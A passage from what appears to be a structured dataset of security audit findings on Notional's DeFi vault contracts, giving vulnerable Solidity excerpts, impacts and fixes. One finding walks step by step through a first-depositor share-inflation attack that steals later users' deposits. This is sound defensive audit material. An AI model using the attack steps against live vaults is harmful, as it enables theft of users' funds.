Stable2TokenOracleMath.sol\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n // Prevents overflows, we don't expect tokens to be greater than 18 decimals, don't use\\n // equal sign for minor gas optimization\\n require(poolContext.primaryDecimals < 19); /// @dev primaryDecimals overflow\\n require(poolContext.secondaryDecimals < 19); /// @dev secondaryDecimals overflow\\n require(tokenIndex < 2); /// @dev invalid token index\\n```\\nчUpdate the code to perform the validation against the `secondaryDecimals` state variable.\\n```\\nconstructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n) PoolMixin(notional_, params) {\\n ..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n// Remove the line below\\n require(primaryDecimals <= 18);\\n// Add the line below\\n require(secondaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n}\\n```\\nчThe `Stable2TokenOracleMath._getSpotPrice` will stop working, which will in turn cause the settle vault and reinvest rewards functions to stop working too. Since a vault cannot be settled, the vault is considered broken. If the reinvest rewards function cannot work, the value of users' shares will be stuck as the vault relies on reinvesting rewards to buy more BPT tokens from the market.\\nIn addition, there might be some issues when calculating the price of the tokens since the vault assumes that both primary and secondary tokens have a decimal equal to or less than 18 OR some overflow might occur when processing the token value.ч```\\nFile: TwoTokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n ) PoolMixin(notional_, params) {\\n..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n require(primaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n }\\n```\\n -Vault Share/Strategy Token Calculation Can Be Broken By First User/AttackerчmediumчA well-known attack vector for almost all shares-based liquidity pool contracts, where an early user can manipulate the price per share and profit from late users' deposits because of the precision loss caused by the rather large value of price per share.\\nNote: This issue affects MetaStable2 and Boosted3 balancer leverage vaults\\nFor simplicity's sake, we will simplify the `strategy token` minting formula as follows. Also, assume that the 1 `vault share` is equivalent to 1 `strategy token` for this particular strategy vault, therefore, we will use the term `vault share` and `strategy token` interchangeably here.\\n```\\nstrategyToken = (totalBPTHeld == 0) ? bptClaim : (bptClaim * totalStrategyToken) / totalBPTHeld\\n```\\n\\nThe vault minting formula is taken from the following:\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts BPT to strategy tokens\\n function _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.totalBPTHeld;\\n }\\n```\\n\\nIf the attacker who is the first depositor claims 1 BPT, he will receive 1 Strategy Token. So 1 BPT per Strategy Token. At this point in time, `totalBPTHeld = 1` and `totalStrategyToken = 1`.\\nThe attacker obtains 9999 BPT can be obtained from the open market. He proceeds to deposit the 9999 BPT into the Aura reward pool on behalf of the vault. At this point in time, `totalBPTHeld = 10000` and `totalStrategyToken = 1`. So 10000 BPT per Strategy Token. Refer to the \"How to increase the total BPT held?\" section below for more details.\\nTwo issues can occur from here.\\nIssue 1 - If bptClaim >= totalBPTHeld\\nThe following describes a scenario in which a user's assets are lost and stolen by an attacker. Assume that Alice deposits/borrow some assets and received 19999 BPT. Based on the formula, Alice will only receive 1 Strategy Token. She immediately loses 9999 BPT or half of her assets if she exits the vault or redeems the strategy tokens right after the deposit.\\n```\\nstrategyToken = (bptClaim * totalStrategyToken) / totalBPTHeld\\nstrategyToken = (19999 * 1) / 10000 = 1\\n```\\n\\nIf the attacker exits the vault right after Alice's deposit, the attacker will receive 14999 BPT. He profited 4999 BPT from this attack\\n```\\nbptReceived = (strategyToken * totalBPTHeld) / totalStrategyToken\\nbptReceived = (1 * 29999) / 2 = 14999\\n```\\n\\nIssue 2 - If bptClaim < totalBPTHeld\\nThe following describes a scenario in which a user's assets are lost entirely. Assume that Alice deposits/borrow some assets and received 9999 BPT\\n```\\nstrategyToken = (bptClaim * totalStrategyToken) / totalBPTHeld\\nstrategyToken = (9999 * 1) / 10000 = 0\\n```\\n\\nAs such, she deposited 9999 BPT but did not receive any strategy tokens in return.\\nHow to increase the total BPT held?\\nUnlike the vault design seen in other protocols, Notional's leverage vault does not compute the total BPT held by the vault directly via `BTP.balanceOf(address(vault))`. The vault deposit its BPT to the Aura Reward Pool. Therefore, it is not possible to increase the total BPT held by the vault simply by performing a direct BPT token transfer to the vault or Aura Reward Pool in an attempt to increase it.\\nHowever, there is a workaround to increase the total BPT held by the vault, and this can be executed by anyone.\\nThe `totalBPTHeld` within the vault is obtained by calling the `PoolMixin._bptHeld` function.\\n```\\nFile: PoolMixin.sol\\n function _baseStrategyContext() internal view returns(StrategyContext memory) {\\n return StrategyContext({\\n totalBPTHeld: _bptHeld(),\\n settlementPeriodInSeconds: SETTLEMENT_PERIOD_IN_SECONDS,\\n tradingModule: TRADING_MODULE,\\n vaultSettings: BalancerVaultStorage.getStrategyVaultSettings(),\\n vaultState: BalancerVaultStorage.getStrategyVaultState(),\\n feeReceiver: FEE_RECEIVER\\n });\\n }\\n```\\n\\nWithin the `PoolMixin._bptHeld` function, it will call the `AURA_REWARD_POOL.balanceOf(address(this))` to retrieve the number of BPT that the vault has deposited into the Aura Reward Pool.\\n```\\nFile: PoolMixin.sol\\n /// @dev Gets the total BPT held by the aura reward pool\\n function _bptHeld() internal view returns (uint256) {\\n return AURA_REWARD_POOL.balanceOf(address(this));\\n }\\n```\\n\\nThe following is the contract of the AURA_REWARD_POOL taken from the Etherscan. Note that the `AURA_REWARD_POOL.balanceOf` will retrieve the number of BPT tokens held by an account. In this example, the account will be the vault's address.\\n```\\nFile: BaseRewardPool4626.sol\\n/**\\n * @dev Returns the amount of tokens owned by `account`.\\n */\\nfunction balanceOf(address account) public view override(BaseRewardPool, IERC20) returns (uint256) {\\n return BaseRewardPool.balanceOf(account);\\n}\\n```\\n\\n```\\nFile: BaseRewardPool.sol\\nfunction balanceOf(address account) public view virtual returns (uint256) {\\n return _balances[account];\\n}\\n```\\n\\nTo increase the balance, the `deposit(uint256 _pid, uint256 _amount, bool _stake)` function of Aura's Booster contract can be called. However, the problem is that this function will deposit to the `msg.sender` and there is no way to spoof the vault's address. Thus, using this function will not work.\\nHowever, there is a second method that can be used to perform a deposit. The `AURA_REWARD_POOL` point to the `BaseRewardPool4626`, thus the reward pool is an ERC4626 vault. The Aura's ERC4626 vault supports an alternative deposit function called `BaseRewardPool4626.deposit` that allows anyone to deposit on behalf of another account. An attacker can leverage the `BaseRewardPool4626.deposit` function by specifying the `receiver` parameter to be the `vault.address` in an attempt to increase the total BPT tokens held by the vault.\\n```\\nFile: BaseRewardPool4626.sol\\n/**\\n * @notice Mints `shares` Vault shares to `receiver`.\\n * @dev Because `asset` is not actually what is collected here, first wrap to required token in the booster.\\n */\\nfunction deposit(uint256 assets, address receiver) public virtual override nonReentrant returns (uint256) {\\n // Transfer \"asset\" (crvLP) from sender\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), assets);\\n\\n // Convert crvLP to cvxLP through normal booster deposit process, but don't stake\\n uint256 balBefore = stakingToken.balanceOf(address(this));\\n IDeposit(operator).deposit(pid, assets, false);\\n uint256 balAfter = stakingToken.balanceOf(address(this));\\n\\n require(balAfter.sub(balBefore) >= assets, \"!deposit\");\\n\\n // Perform stake manually, now that the funds have been received\\n _processStake(assets, receiver);\\n\\n emit Deposit(msg.sender, receiver, assets, assets);\\n emit Staked(receiver, assets);\\n return assets;\\n}\\n```\\n\\n```\\nFile: BaseRewardPool.sol \\n/**\\n* @dev Generic internal staking function that basically does 3 things: update rewards based\\n* on previous balance, trigger also on any child contracts, then update balances.\\n* @param _amount Units to add to the users balance\\n* @param _receiver Address of user who will receive the stake\\n*/\\nfunction _processStake(uint256 _amount, address _receiver) internal updateReward(_receiver) {\\n require(_amount > 0, 'RewardPool : Cannot stake 0');\\n\\n //also stake to linked rewards\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).stake(_receiver, _amount);\\n }\\n\\n _totalSupply = _totalSupply.add(_amount);\\n _balances[_receiver] = _balances[_receiver].add(_amount);\\n}\\n```\\nчConsider requiring a minimal amount of strategy tokens to be minted for the first minter, and send a portion of the initial mints as a reserve to the Notional Treasury so that the pricePerShare/pricePerStrategyToken can be more resistant to manipulation.\\nReference\\nA similar issue was found in a past Sherlock auditчThe attacker can profit from future users' deposits while the late users will lose part of their funds to the attacker. Additionally, it is also possible for users to get no share in return for their deposited funds.ч```\\nstrategyToken = (totalBPTHeld == 0) ? bptClaim : (bptClaim * totalStrategyToken) / totalBPTHeld\\n```\\n -UniV2Adapter#getExecutionData doesn't properly handle native ETH swapsчmediumчUniV2Adapter#getExecutionData doesn't properly account for native ETH trades which makes them impossible. Neither method selected supports direct ETH trades, and sender/target are not set correctly for TradingUtils_executeTrade to automatically convert\\n```\\nspender = address(Deployments.UNIV2_ROUTER);\\ntarget = address(Deployments.UNIV2_ROUTER);\\n// msgValue is always zero for uniswap\\n\\nif (\\n tradeType == TradeType.EXACT_IN_SINGLE ||\\n tradeType == TradeType.EXACT_IN_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n} else if (\\n tradeType == TradeType.EXACT_OUT_SINGLE ||\\n tradeType == TradeType.EXACT_OUT_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapTokensForExactTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n}\\n```\\n\\nUniV2Adapter#getExecutionData either returns the swapTokensForExactTokens or swapExactTokensForTokens, neither of with support native ETH. It also doesn't set spender and target like UniV3Adapter, so _executeTrade won't automatically convert it to a WETH call. The result is that all Uniswap V2 calls made with native ETH will fail. Given that Notional operates in native ETH rather than WETH, this is an important feature that currently does not function.чThere are two possible solutions:\\nChange the way that target and sender are set to match the implementation in UniV3Adapter\\nModify the return data to return the correct selector for each case (swapExactETHForTokens, swapTokensForExactETH, etc.)\\nGiven that the infrastructure for Uniswap V3 already exists in TradingUtils_executeTrade the first option would be the easiest, and would give the same results considering it's basically the same as what the router is doing internally anyways.чUniswap V2 calls won't support native ETHч```\\nspender = address(Deployments.UNIV2_ROUTER);\\ntarget = address(Deployments.UNIV2_ROUTER);\\n// msgValue is always zero for uniswap\\n\\nif (\\n tradeType == TradeType.EXACT_IN_SINGLE ||\\n tradeType == TradeType.EXACT_IN_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n} else if (\\n tradeType == TradeType.EXACT_OUT_SINGLE ||\\n tradeType == TradeType.EXACT_OUT_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapTokensForExactTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n}\\n```\\n -Deployments.sol uses the wrong address for UNIV2 router which causes all Uniswap V2 calls to failчmediumчDeployments.sol accidentally uses the Uniswap V3 router address for UNIV2_ROUTER which causes all Uniswap V2 calls to fail\\n```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0xE592427A0AEce92De3Edee1F18E0157C05861564);\\n```\\n\\nThe constant UNIV2_ROUTER contains the address for the Uniswap V3 router, which doesn't contain the \"swapExactTokensForTokens\" or \"swapTokensForExactTokens\" methods. As a result, all calls made to Uniswap V2 will revert.чChange UNIV2_ROUTER to the address of the V2 router:\\n```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);\\n```\\nчUniswap V2 is totally unusableч```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0xE592427A0AEce92De3Edee1F18E0157C05861564);\\n```\\n -stakingContext.auraRewardPool.withdrawAndUnwrap boolean return value not handled in Boosted3TokenPoolUtils.sol and TwoTokenPoolUtils.solчmediumчstakingContext.auraRewardPool.withdrawAndUnwrap boolean return value not handled in Boosted3TokenPoolUtils.sol and TwoTokenPoolUtils.sol\\nWhen calling function _unstakeAndExitPool,\\nthe contract withdraw BPT tokens back to the vault for redemption\\nby calling\\n```\\nstakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\n```\\n\\nhowever, the underlying call withdrawAndUnwrap returns boolean value, the contract does not handle the return value.\\nThe see the interface of the IAuraRewardPool already indicate that the underlying call returns value\\n```\\ninterface IAuraRewardPool {\\n function withdrawAndUnwrap(uint256 amount, bool claim) external returns(bool);\\n```\\n\\nand the underlying call with BaseRewardConvexPool.sol also returns the boolean\\n```\\n function withdrawAndUnwrap(uint256 amount, bool claim) public updateReward(msg.sender) returns(bool){\\n```\\nчWe recommend the project handle the return value when unstaking explicitly\\n```\\nbool unstaked = stakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\nrequire(unstaked, 'unstake failed');\\n```\\nчBecause there are stacks of external call:\\nNotional -> auraRewardPool -> BaseRewardPool,\\nwithout handling the return value explicitly, the transaction may risk fails silently.ч```\\nstakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\n```\\n -stakingContext.auraBooster.deposit boolean return value not handled in Boosted3TokenPoolUtils.solчmediumчstakingContext.auraBooster.deposit boolean return value not handled in Boosted3TokenPoolUtils.sol\\nthe function _joinPoolAndStake in Boosted3TokenPoolUtils.sol is used extensively when handling the token stake.\\nHowever, when entering the stake and interacting with external contract, the logic does not handle the returned boolean value in the code below\\n```\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n```\\n\\nIn the AuraBooster implmenetation, a Boolean is indeed returned to acknowledge that deposit is completely successfully.\\n```\\n /**\\n * @notice Deposits an \"_amount\" to a given gauge (specified by _pid), mints a `DepositToken`\\n * and subsequently stakes that on Convex BaseRewardPool\\n */\\n function deposit(uint256 _pid, uint256 _amount, bool _stake) public returns(bool){\\n```\\nчWe recommend the project handle the stakingContext.auraBooster.deposit boolean return value explicitly.\\n```\\n // Transfer token to Aura protocol for boosted staking\\n bool staked = stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n require(staked, 'stake failed');\\n```\\nчNotional -> AuraBooster -> BaseRewardPool\\nWithout handling the boolean value explitily, there is risk that transaction may be fail sliently.\\nBecause there are two layers of external callч```\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n```\\n -`CrossCurrencyfCashVault` Cannot Settle Its Assets In PiecesчmediumчThe `CrossCurrencyfCashVault` vault cannot settle its assets in pieces. Thus, it might cause the vault to incur unnecessary slippage.\\nThe settle vault function is designed in a manner where its assets can be settled in pieces. Therefore, the `settleVault` function accepts a `strategyTokens` or `strategyTokensToRedeem` parameter to allow the caller to specify the number of strategy tokens to be settled.\\nThe reason as mentioned in Notional's walkthrough video (Refer to the explanation at 15.50min mark) is that in some cases the caller might want to break down into multiple transactions due to massive slippage.\\nFor instance, the vault might utilize a 2 day settlement period to allow the vault to settle its assets in pieces so that it can avoid unnecessary transaction costs associated with converting all its assets back to USDC in a single transaction.\\n```\\nFile: CrossCurrencyfCashVault.sol\\n /**\\n * @notice During settlement all of the fCash balance in the lend currency will be redeemed to the\\n * underlying token and traded back to the borrow currency. All of the borrow currency will be deposited\\n * into the Notional contract as asset tokens and held for accounts to withdraw. Settlement can only\\n * be called after maturity.\\n * @param maturity the maturity to settle\\n * @param settlementTrade details for the settlement trade\\n */\\n function settleVault(uint256 maturity, uint256 strategyTokens, bytes calldata settlementTrade) external {\\n require(maturity <= block.timestamp, \"Cannot Settle\");\\n VaultState memory vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n require(vaultState.isSettled == false);\\n require(vaultState.totalStrategyTokens >= strategyTokens);\\n\\n RedeemParams memory params = abi.decode(settlementTrade, (RedeemParams));\\n \\n // The only way for underlying value to be negative would be if the vault has somehow ended up with a borrowing\\n // position in the lend underlying currency. This is explicitly prevented during redemption.\\n uint256 underlyingValue = convertStrategyToUnderlying(\\n address(0), vaultState.totalStrategyTokens, maturity\\n ).toUint();\\n\\n // Authenticate the minimum purchase amount, all tokens will be sold given this slippage limit.\\n uint256 minAllowedPurchaseAmount = (underlyingValue * settlementSlippageLimit) / SETTLEMENT_SLIPPAGE_PRECISION;\\n require(params.minPurchaseAmount >= minAllowedPurchaseAmount, \"Purchase Limit\");\\n\\n NOTIONAL.redeemStrategyTokensToCash(maturity, strategyTokens, settlementTrade);\\n\\n // If there are no more strategy tokens left, then mark the vault as settled\\n vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n if (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n }\\n }\\n```\\n\\nDuring vault settlement, the `CrossCurrencyfCashVault._redeemFromNotional` function will be called, and the code in lines 252-262 will be executed. However, it was observed that the `strategyTokens` parameter is ignored, and the vault will forcefully settle all the strategy tokens in one go. As such, there is no way for the caller to break down the settle vault transaction into multiple transactions.\\n```\\nFile: CrossCurrencyfCashVault.sol\\n function _redeemFromNotional(\\n address account,\\n uint256 strategyTokens,\\n uint256 maturity,\\n bytes calldata data\\n ) internal override returns (uint256 borrowedCurrencyAmount) {\\n uint256 balanceBefore = LEND_UNDERLYING_TOKEN.balanceOf(address(this));\\n RedeemParams memory params = abi.decode(data, (RedeemParams));\\n\\n if (maturity <= block.timestamp) {\\n // Only allow the vault to redeem past maturity to settle all positions\\n require(account == address(this));\\n NOTIONAL.settleAccount(address(this));\\n (int256 cashBalance, /* */, /* */) = NOTIONAL.getAccountBalance(LEND_CURRENCY_ID, address(this));\\n\\n // It should never be possible that this contract has a negative cash balance\\n require(0 <= cashBalance && cashBalance <= int256(uint256(type(uint88).max)));\\n\\n // Withdraws all cash to underlying\\n NOTIONAL.withdraw(LEND_CURRENCY_ID, uint88(uint256(cashBalance)), true);\\n } else {\\n // Sells fCash on Notional AMM (via borrowing)\\n BalanceActionWithTrades[] memory action = _encodeBorrowTrade(\\n maturity,\\n strategyTokens,\\n params.maxBorrowRate\\n );\\n NOTIONAL.batchBalanceAndTradeAction(address(this), action);\\n\\n // Check that we have not somehow borrowed into a negative fCash position, vault borrows\\n // are not included in account context\\n AccountContext memory accountContext = NOTIONAL.getAccountContext(address(this));\\n require(accountContext.hasDebt == 0x00);\\n }\\n\\n uint256 balanceAfter = LEND_UNDERLYING_TOKEN.balanceOf(address(this));\\n \\n // Trade back to borrow currency for repayment\\n Trade memory trade = Trade({\\n tradeType: TradeType.EXACT_IN_SINGLE,\\n sellToken: address(LEND_UNDERLYING_TOKEN),\\n buyToken: address(_underlyingToken()),\\n amount: balanceAfter - balanceBefore,\\n limit: params.minPurchaseAmount,\\n deadline: block.timestamp,\\n exchangeData: params.exchangeData\\n });\\n\\n (/* */, borrowedCurrencyAmount) = _executeTrade(params.dexId, trade);\\n }\\n```\\nчIt is recommended to update the `CrossCurrencyfCashVault._redeemFromNotional` function to allow the vault to be settled in multiple transactions.чThe vault might incur unnecessary slippage during settlement as the settlement cannot be broken into multiple transactions.ч```\\nFile: CrossCurrencyfCashVault.sol\\n /**\\n * @notice During settlement all of the fCash balance in the lend currency will be redeemed to the\\n * underlying token and traded back to the borrow currency. All of the borrow currency will be deposited\\n * into the Notional contract as asset tokens and held for accounts to withdraw. Settlement can only\\n * be called after maturity.\\n * @param maturity the maturity to settle\\n * @param settlementTrade details for the settlement trade\\n */\\n function settleVault(uint256 maturity, uint256 strategyTokens, bytes calldata settlementTrade) external {\\n require(maturity <= block.timestamp, \"Cannot Settle\");\\n VaultState memory vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n require(vaultState.isSettled == false);\\n require(vaultState.totalStrategyTokens >= strategyTokens);\\n\\n RedeemParams memory params = abi.decode(settlementTrade, (RedeemParams));\\n \\n // The only way for underlying value to be negative would be if the vault has somehow ended up with a borrowing\\n // position in the lend underlying currency. This is explicitly prevented during redemption.\\n uint256 underlyingValue = convertStrategyToUnderlying(\\n address(0), vaultState.totalStrategyTokens, maturity\\n ).toUint();\\n\\n // Authenticate the minimum purchase amount, all tokens will be sold given this slippage limit.\\n uint256 minAllowedPurchaseAmount = (underlyingValue * settlementSlippageLimit) / SETTLEMENT_SLIPPAGE_PRECISION;\\n require(params.minPurchaseAmount >= minAllowedPurchaseAmount, \"Purchase Limit\");\\n\\n NOTIONAL.redeemStrategyTokensToCash(maturity, strategyTokens, settlementTrade);\\n\\n // If there are no more strategy tokens left, then mark the vault as settled\\n vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n if (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n }\\n }\\n```\\n -`CrossCurrencyfCashVault` Cannot Be Upgradedчmediumч`CrossCurrencyfCashVault` cannot be upgraded as it is missing the authorize upgrade method.\\nThe Cross Currency Vault is expected to be upgradeable as:\\nThis vault is similar to the other vaults (Boosted3TokenAuraVault and MetaStable2TokenAuraVault) provided by Notional that are upgradeable by default.\\nThe `BaseStrategyVault` has configured the storage gaps `uint256[45] private __gap` for upgrading purposes\\nClarified with the sponsor and noted that Cross Currency Vault should be upgradeable\\n`CrossCurrencyfCashVault` inherits from `BaseStrategyVault`. However, the `BaseStrategyVault` forget to inherit Openzepplin's `UUPSUpgradeable` contract. Therefore, it is missing the authorize upgrade method, and the contract cannot be upgraded.\\n```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n\\n```\\ncontract CrossCurrencyfCashVault is BaseStrategyVault {\\n using TypeConvert for uint256;\\n using TypeConvert for int256;\\n\\n uint256 public constant SETTLEMENT_SLIPPAGE_PRECISION = 1e18;\\n\\n struct DepositParams {\\n // Minimum purchase amount of the lend underlying token, this is\\n // based on the deposit + borrowed amount and must be set to a non-zero\\n // value to establish a slippage limit.\\n uint256 minPurchaseAmount;\\n // Minimum annualized lending rate, can be set to zero for no slippage limit\\n uint32 minLendRate;\\n // ID of the desired DEX to trade on, _depositFromNotional will always trade\\n // using an EXACT_IN_SINGLE trade which is supported by all DEXes\\n uint16 dexId;\\n // Exchange data depending on the selected dexId\\n ..SNIP..\\n```\\nчIt is recommended to Inherit Openzepplin's `UUPSUpgradeable` contract and implement the missing authorize upgrade method.\\n```\\n// Remove the line below\\n abstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n// Add the line below\\n abstract contract BaseStrategyVault is Initializable, IStrategyVault, UUPSUpgradeable {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n// Add the line below\\n function _authorizeUpgrade(\\n// Add the line below\\n address /* newImplementation */\\n// Add the line below\\n ) internal override onlyNotionalOwner {} \\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\nчIf a critical bug is discovered within the Cross Currency Vault after launching that causes a loss of assets, the vault cannot be upgraded unlike the other balancer-related vaults to fix the bugs. All assets within the vault will be lostч```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n -getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.solчmediumчgetGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol\\nThis report has two part,\\npart one trace the accounting issue in MetaStable2TokenAuraHelper.sol,\\npart two trace the accounting issue in Boosted3TokenAuraHelper.sol,\\nboth issue rooted in not handling the getGetAmplificationParameter() precision\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620\\nbut in the code, the isUpdating and precision returned is ignored and not used.\\nPart One\\nLet's trace the function reinvestReward in MetaStable2TokenAuraHelper.sol\\n```\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n )\\n```\\n\\nIt calls\\n```\\n// Make sure we are joining with the right proportion to minimize slippage\\n oracleContext._validateSpotPriceAndPairPrice({\\n poolContext: poolContext,\\n strategyContext: strategyContext,\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nthen it calls\\n```\\nuint256 spotPrice = _getSpotPrice(oracleContext, poolContext, 0);\\n```\\n\\nthen it calls\\nInsite the function\\n```\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (poolContext.primaryBalance, poolContext.secondaryBalance) :\\n (poolContext.secondaryBalance, poolContext.primaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX,\\n balanceY: balanceY\\n });\\n```\\n\\nWhat's wrong with this, I believe the precision has issue for ampParam\\nBecause When we get the oracleContext.ampParam from MetaStable2TokenVaultMixin.sol\\nWe did not use the precision returned from the pool\\n```\\n (\\n uint256 value,\\n /* bool isUpdating */,\\n /* uint256 precision */\\n ) = IMetaStablePool(address(BALANCER_POOL_TOKEN)).getAmplificationParameter();\\n```\\n\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620\\nThe formula that calculate the spot price is\\n```\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n```\\n\\nthe function _calcSpotPrice hardcode the amp precision to 1e3;\\n```\\n uint256 internal constant _AMP_PRECISION = 1e3;\\n```\\n\\nand implement\\n```\\nuint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nif the pool's ampParameter is not equal to _AMP_PRECISION, the math will break.\\nPart Two\\nLet's trace the call in Boosted3TokenPoolUtils.sol\\nFirst the function reinvestReward in Boosted3TokenAuraHelper.sol is called\\n```\\n function reinvestReward(\\n Boosted3TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) \\n```\\n\\nThen we call\\n```\\n uint256 minBPT = context.poolContext._getMinBPT(\\n oracleContext, strategyContext, primaryAmount\\n );\\n```\\n\\nthen we call\\n```\\n minBPT = StableMath._calcBptOutGivenExactTokensIn({\\n amp: oracleContext.ampParam,\\n balances: balances,\\n amountsIn: amountsIn,\\n bptTotalSupply: virtualSupply,\\n swapFeePercentage: 0,\\n currentInvariant: invariant\\n });\\n```\\n\\nthen we call\\n```\\n // Get current and new invariants, taking swap fees into account\\n uint256 newInvariant = _calculateInvariant(amp, newBalances, false);\\n uint256 invariantRatio = newInvariant.divDown(currentInvariant);\\n```\\n\\nthen we call\\n```\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n```\\n\\nwe just use the amplificationParameter without handling the precision.\\nThe amplificationParameter comes from BoostedTokenPoolMixin.sol\\n```\\n (\\n 